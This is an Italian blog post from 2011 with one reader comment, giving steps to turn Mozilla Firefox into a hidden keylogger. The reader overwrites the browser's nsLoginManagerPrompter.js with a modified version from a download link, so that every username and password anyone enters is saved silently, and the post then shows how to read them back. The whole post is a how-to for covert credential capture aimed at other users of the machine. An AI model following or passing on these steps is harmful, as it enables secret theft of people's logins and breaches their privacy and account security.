martedì 3 maggio 2011

Come rendere Mozilla Firefox un keylogger.

firefox

Qualcuno (chiamato RAJ) ha trovato un piccolo trucco che trasforma il nostro Mozilla Firefox in un keylogger non rilevabile.

Questo keylogger verrà utilizzato per memorizzare tutti i nomi utente e password che verranno inseriti dall'utente! Nessun software aggiuntivo o strumento è richiesto solo bisogno a sostituire il già esistente script con un’altro modificato

I passaggi per trasformare il vostro Firefox in un Keylogger.

1) Chiudere applicazione Firefox se aperto

2) Vai a:

Windows - C:/Programmi / Mozilla Firefox / Componenti
Mac - Applicazioni > Fare clic destro Firefox > Mostra Contenuto Pacchetto > Contents / MacOS / Componenti.
3) Trova lo script "nsLoginManagerPrompter.js"

4) Clicca qui per scaricare il file, scompattarlo e semplicemente sovrascrivere il nsLoginManagerPrompter.js esistente con questo, Si tratta di uno già modificato per salvare tutti i nomi utente e password con intimazione utente.

Da ora in poi, quando qualcuno accede qualsiasi sito, che username e password verranno salvate automaticamente, senza la richiesta!

Per recuperare le informazioni di account, assicurarsi che Firefox viene aperto, andare in Strumenti > Opzioni ... > Scheda Protezione > clicca su password salvate, quindi fare clic su Mostra password, e premere YES.

Arrivederci al prossimo post

Michele Balzano

1 commento:

  1. nsLoginManagerPrompter.js su mac non l'ho sovrascritto perchè nella cartella components non era presente, l'ho solo aggiunto

    RispondiElimina

Post più popolari